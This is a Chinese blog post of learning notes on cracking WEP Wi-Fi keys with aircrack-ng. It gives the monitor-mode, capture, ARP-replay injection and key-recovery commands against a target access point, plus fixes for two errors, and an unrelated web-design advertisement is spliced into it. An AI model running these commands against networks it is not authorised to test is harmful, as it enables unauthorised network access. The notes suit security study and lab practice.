关于aircrack-ng的一些学习笔记及问题

    最近无意中接触到了一些无线方面的技术资料,又发现了一个比较速度的wifi***方法,这个虽然没有reaver那么稳定,个人觉得在时间方面要比reaver快的多。可能做实验的笔记本太旧的原因,途中遇到几个问题,如果有同仁遇到,还请指点一二。此处先记录下这几条主要命令备忘。

公司主营业务:网站设计制作、成都做网站、移动网站开发等业务。帮助企业客户真正实现互联网宣传,提高企业的竞争能力。创新互联公司是一支青春激扬、勤奋敬业、活力青春激扬、勤奋敬业、活力澎湃、和谐高效的团队。公司秉承以“开放、自由、严谨、自律”为核心的企业文化,感谢他们对我们的高要求,感谢他们从不同领域给我们带来的挑战,让我们激情的团队有机会用头脑与智慧不断的给客户带来惊喜。创新互联公司推出平湖免费做网站回馈大家。

环境是BT5,默认安装了较高版本,所以不用升级,但还是附上安装命令:

wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz

tar zxvf

cd aircrack-ng-XXX

make

make install

下面就拿WEP加密做示例:

查看无线网卡,一般默认是wlan0,如果有外置或其他无线网卡,那就选择相应的网卡启用即可。

单独查看无线网卡信息:iwconfig

启用无线网卡:ifconfig wlan0 up

激活网卡至监听(monitor)模式:

airmon-ng start wlan0

扫描当前地点无线网络信息:

airodump-ng mon0

开始抓包,保存为logas前缀的.ivs后缀,6为AP的频道

airodump-ng --ivs -w longas -c 6 wlan0

在上条命令运行的情况下,打开一个新的终端窗口,输入下面命令对目标AP进行ArpRequest注入***,这样采用了一种称之为ArpRequest的方式来读取ARP请求报文,并伪造大量的报文再次重发出去,以便刺激AP产生更多的数据包,从而加快破解过程。

aireplay-ng -3 -b AP-mac -h Client-mac mon0

当IVs值达到2万以上,可尝试下面命令破解

aircrack-ng 捕获的IVS文件

破解成功后,KEYFOUND!后面的ACSI码就是密码

PS:

问题1:

当在新窗口输入airodump-ng --ivs -w longas -c 6 wlan0时,遇到了报错:

ioctl(SIOCSWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE802.11,

AEPHRD_IEEE802.11_FULL or ARPHRD_IEEE80211_PRISM instead. Make

Sysfs injection support was not found either.

我尝试的方法是使用命令:

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
sudo iwconfig wlan0
sudo airmon-ng start wlan0
airodump-ng --ivs -w longas -c 6 wlan0

就可以了

问题2:

aireplay-ng -3 -b AP-mac -h Client-mac mon0时,出现了错误:

Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

因为这条命令并不直接影响结果,暂时也没找到合适解决方法,如果各位有好的解决方法,请指点。

这里只简单的列出了主要用到的命令,仅供实验参考,不得用于非法操作,否则后果自负。


网站标题:关于aircrack-ng的一些学习笔记及问题
本文来源:http://cdiso.cn/article/ipheis.html

其他资讯